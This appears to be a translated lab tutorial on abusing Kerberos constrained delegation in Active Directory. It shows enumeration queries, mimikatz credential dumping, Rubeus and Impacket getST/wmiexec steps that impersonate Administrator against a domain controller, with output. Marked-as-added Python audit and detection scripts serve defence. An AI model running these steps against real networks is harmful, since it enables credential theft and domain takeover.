Constrained Delegation Attacks
Concept:
After Windows Server 2003, Microsoft introduced unconstrained delegation. At the same time, to make constrained delegation work, Microsoft in 2007 introduced two protocol extensions for the TGS_REQ and TGS_REP phases of Kerberos: S4U2self (Service for User to Self) and S4U2proxy (Service for User to Proxy).
With constrained delegation, the service account can obtain a service ticket (ST) for the user only to the specified services, so it can impersonate that user only against those particular services. The msDS-AllowedToDelegateTo attribute of an account configured for constrained delegation specifies which SPNs it may delegate to. Configuring constrained delegation requires the SeEnableDelegationPrivilege privilege, which by default is granted only to Domain Admins and Enterprise Admins.
There are two kinds of constrained delegation:
- Use Kerberos only (no protocol transition possible)
- Use any authentication protocol
S4u2self & S4U2proxy
S4U2self allows a service to request, on behalf of an arbitrary user, a service ticket (ST) to itself.
S4U2proxy allows a service that already holds such an ST to obtain, on behalf of that user, a service ticket to another service.
Constrained delegation restricts the scope of S4U2proxy requests, so that a service with the delegation attribute configured can impersonate the user only against the specific other services it is allowed to reach.
An account configured for constrained delegation shows two changes in its attributes:
- The account's userAccountControl attribute has the TRUSTED_TO_AUTH_FOR_DELEGATION flag set; the value becomes 16781312.
- The account's msDS-AllowedToDelegateTo attribute lists the services it is allowed to delegate to.
Environment:
- ad01: domain controller, administrator, 10.10.10.100
- dc01: domain-joined host, ordinary domain user test (User), 10.10.10.101
Configure constrained delegation on the domain controller
Constrained delegation for a computer account: Control Panel \ System and Security \ Administrative Tools \ Active Directory Users and Computers (%SystemRoot%\system32\dsa.msc) ---> <domain>/Computers/<name>/Properties ---> Delegation ---> Trust this computer for delegation to specified services only (Use any authentication protocol) ---> Add ---> cifs ad01.sunday.com
Configure constrained delegation for the user test in the same way.
Query methods:
ADFind:
Run as an ordinary domain user:
# AdFind.exe: query machine accounts configured for constrained delegation
AdFind.exe -b "DC=sunday,DC=com" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto
# AdFind.exe: query service (user) accounts configured for constrained delegation
AdFind.exe -b "DC=sunday,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
PowerView:
# import the module
import-module .\powerview.ps1
# PowerView: query machine accounts configured for constrained delegation
Get-NetComputer -TrustedToAuth -domain sunday.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|ft -Wrap -AutoSize
# PowerView: query service (user) accounts configured for constrained delegation
Get-DomainUser -TrustedToAuth -domain sunday.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|fl
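An added audit example (not part of the original post) that post-processes the kind of entries the AdFind/PowerView queries above return: it decodes userAccountControl into named flags, classifies each entry as Kerberos-only or any-protocol (the protocol-transition setting the S4U2self step relies on), and flags entries whose allowed targets include a domain controller. The records are constructed sample data and the set of DC host names is an assumption.

```python
# Added example, not from the original post: post-process the entries that the
# AdFind/PowerView queries above return (records here are constructed samples).
UAC_FLAGS = {                                     # documented userAccountControl bits
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x80000: "TRUSTED_FOR_DELEGATION",            # unconstrained delegation
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",  # "any protocol" (protocol transition)
}

def decode_uac(value):  # names of the flags set in a userAccountControl value
    return {name for bit, name in UAC_FLAGS.items() if value & bit}

def delegation_type(uac):  # Kerberos-only sets no UAC bit; any-protocol sets 0x1000000
    return "any-protocol" if uac & 0x1000000 else "kerberos-only"

def target_host(spn):  # 'mssqlsvc/sql01.sunday.com:1433' -> 'sql01.sunday.com'
    return spn.split("/", 1)[-1].split(":")[0].lower()

def audit(records, dc_hosts):
    """One finding per account whose msDS-AllowedToDelegateTo is populated."""
    findings = []
    for rec in records:
        targets = rec.get("msDS-AllowedToDelegateTo", [])
        if not targets:
            continue                      # no constrained delegation configured
        uac = rec["userAccountControl"]
        kind = delegation_type(uac)
        dc_targets = [t for t in targets if target_host(t) in dc_hosts]
        findings.append({
            "account": rec["sAMAccountName"], "type": kind,
            "flags": sorted(decode_uac(uac)), "dc_targets": dc_targets,
            # any-protocol plus a DC as target is the combination the S4U abuse needs
            "high_risk": kind == "any-protocol" and bool(dc_targets),
        })
    return findings

SAMPLE = [  # constructed, mirroring the lab: dc01$ and test delegate to cifs/ad01
    {"sAMAccountName": "dc01$", "userAccountControl": 16781312,
     "msDS-AllowedToDelegateTo": ["cifs/ad01.sunday.com"]},
    {"sAMAccountName": "test", "userAccountControl": 0x200 | 0x1000000,
     "msDS-AllowedToDelegateTo": ["cifs/ad01.sunday.com"]},
    {"sAMAccountName": "websvc", "userAccountControl": 0x200,
     "msDS-AllowedToDelegateTo": ["mssqlsvc/sql01.sunday.com:1433"]},
]

if __name__ == "__main__":
    for finding in audit(SAMPLE, {"ad01.sunday.com"}):  # DC host set is an assumption
        print(finding)
```

The value 16781312 from the attribute list above decodes to WORKSTATION_TRUST_ACCOUNT plus TRUSTED_TO_AUTH_FOR_DELEGATION, i.e. a computer account with "any authentication protocol" delegation.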
(1) Attack method: using the machine account's hash
Prerequisites:
- Administrator privileges
- The target machine account is configured for constrained delegation
Procedure:
# Obtain the machine account's NTLM hash with mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
532e9a018289789294a524f8f6f543cc
# Request a TGT for the machine account dc01$ with Rubeus, using its RC4 (NTLM) hash
Rubeus.exe asktgt /user:dc01$ /rc4:532e9a018289789294a524f8f6f543cc /domain:sunday.com /dc:ad01.sunday.com /nowrap
# Use Rubeus S4U (S4U2self, then S4U2proxy) to impersonate the domain administrator Administrator against the domain controller's CIFS service and inject the resulting ticket into memory
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/ad01.sunday.com /dc:ad01.sunday.com /ptt /ticket:<base64 ticket.kirbi from the asktgt step>
# Then simply dir the share
dir \\ad01.sunday.com\c$
Pitfall: when importing the ticket with Rubeus from cmd, you may get an "insufficient resources" error and the import fails; try importing from PowerShell instead.
C:\Windows\system32>cd C:\
C:\>Rubeus.exe asktgt /user:dc01$ /rc4:532e9a018289789294a524f8f6f543cc /domain:sunday.com /dc:ad01.sunday.com /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.6.4
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 532e9a018289789294a524f8f6f543cc
[*] Building AS-REQ (w/ preauth) for: 'sunday.com\dc01$'
[+] TGT request successful!
[*] base64(ticket.kirbi):
[base64 ticket.kirbi elided]
ServiceName : krbtgt/sunday.com
ServiceRealm : SUNDAY.COM
UserName : dc01$
UserRealm : SUNDAY.COM
StartTime : 2023/6/9 10:59:55
EndTime : 2023/6/9 20:59:55
RenewTill : 2023/6/16 10:59:55
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : fJbJ4UxDsF3FdCLsRn3Nmw==
C:\>Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/ad01.sunday.com /dc:ad01.sunday.com /ptt /ticket:[base64 ticket.kirbi elided]
[*] Action: S4U
[*] Action: S4U
[*] Using domain controller: ad01.sunday.com (10.10.10.100)
[*] Building S4U2self request for: 'dc01$@SUNDAY.COM'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'dc01$@SUNDAY.COM'
[*] base64(ticket.kirbi):
[*] Impersonating user 'Administrator' to target SPN 'CIFS/ad01.sunday.com'
[*] Using domain controller: ad01.sunday.com (10.10.10.100)
[*] Building S4U2proxy request for service: 'CIFS/ad01.sunday.com'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'CIFS/ad01.sunday.com':
[+] Ticket successfully imported!
C:\> dir \\ad01.sunday.com\c$
驱动器 \\ad01.sunday.com\c$ 中的卷没有标签。
卷的序列号是 961F-20FE
\\ad01.sunday.com\c$ 的目录
2013/08/22 23:52 <DIR> PerfLogs
2023/06/07 14:14 <DIR> Program Files
2013/08/22 23:39 <DIR> Program Files (x86)
2023/06/07 09:53 <DIR> Users
2023/06/07 15:08 <DIR> Windows
0 个文件 0 字节
5 个目录 93,420,552,192 可用字节
(2) Attack method: using the machine account's hash (getST)
Here the getST.py script from the Impacket toolkit is used to request the service ticket, and the resulting ticket is then used with wmiexec.py to log in remotely.
Prerequisites:
- Administrator privileges
- The target machine account is configured for constrained delegation
Procedure:
# Obtain the machine account's NTLM hash with mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
532e9a018289789294a524f8f6f543cc
# Request the service ticket with getST
python getST.py -dc-ip 10.10.10.100 -spn CIFS/ad01.sunday.com -impersonate administrator sunday.com/dc01$ -hashes :532e9a018289789294a524f8f6f543cc
# Point the credential cache at the saved ticket for remote access (export on Linux)
set KRB5CCNAME=administrator.ccache
# wmiexec opens an interactive shell running as administrator
python3 wmiexec.py -k sunday.com/administrator@ad01.sunday.com -no-pass -dc-ip 10.10.10.100
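As an added detection example (not from the original post), the two rules below are run over constructed Windows Security events that mirror the ticket flow both methods above generate: an RC4 (0x17) TGT requested for a machine account matches the asktgt /rc4 and getST -hashes steps, and a 4769 whose Transited Services field is populated is an S4U2proxy ticket issued on a user's behalf. Field names follow events 4768 and 4769; the event values and the set of privileged account names are assumptions.

```python
# Added example, not from the original post: detection rules for the ticket flow
# the two methods above produce, run over constructed Windows Security events
# (field names follow events 4768/4769; the values are made up to mirror the lab).
RC4_HMAC = "0x17"   # Ticket Encryption Type when a TGT is asked with /rc4 or -hashes

def is_machine_account(name):  # 'dc01$@SUNDAY.COM' -> True, 'test' -> False
    return name.split("@")[0].endswith("$")

def detect(events, privileged):
    """Return (rule, details...) tuples for events matching either rule."""
    alerts = []
    for e in events:
        # Rule 1: machine accounts normally get AES (0x12) TGTs; an RC4 TGT for one
        # matches the Rubeus asktgt /rc4 and getST -hashes steps shown above.
        if (e["EventID"] == 4768 and e["TicketEncryptionType"] == RC4_HMAC
                and is_machine_account(e["TargetUserName"])):
            alerts.append(("rc4-tgt-machine-account", e["TargetUserName"], e["IpAddress"]))
        # Rule 2: a 4769 with Transited Services populated is an S4U2proxy ticket,
        # i.e. the listed service obtained a ticket to ServiceName on a user's behalf.
        if e["EventID"] == 4769 and e.get("TransitedServices", "-") != "-":
            user = e["TargetUserName"].split("@")[0].lower()
            severity = "high" if user in privileged else "medium"
            alerts.append(("s4u2proxy-delegation", e["TargetUserName"],
                           e["ServiceName"], e["TransitedServices"], severity))
    return alerts

SAMPLE_EVENTS = [  # constructed: RC4 TGT for dc01$, S4U2self, S4U2proxy, a benign TGT
    {"EventID": 4768, "TargetUserName": "dc01$", "IpAddress": "10.10.10.101",
     "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "Administrator@SUNDAY.COM",
     "ServiceName": "dc01$", "TicketEncryptionType": "0x12", "TransitedServices": "-"},
    {"EventID": 4769, "TargetUserName": "Administrator@SUNDAY.COM",
     "ServiceName": "CIFS/ad01.sunday.com", "TicketEncryptionType": "0x12",
     "TransitedServices": "dc01$@SUNDAY.COM"},
    {"EventID": 4768, "TargetUserName": "test", "IpAddress": "10.10.10.101",
     "TicketEncryptionType": "0x12"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS, {"administrator"}):  # privileged set is an assumption
        print(alert)
```

The S4U2self request itself (second sample event) leaves Transited Services empty, so only the S4U2proxy ticket for CIFS/ad01.sunday.com and the RC4 TGT are raised.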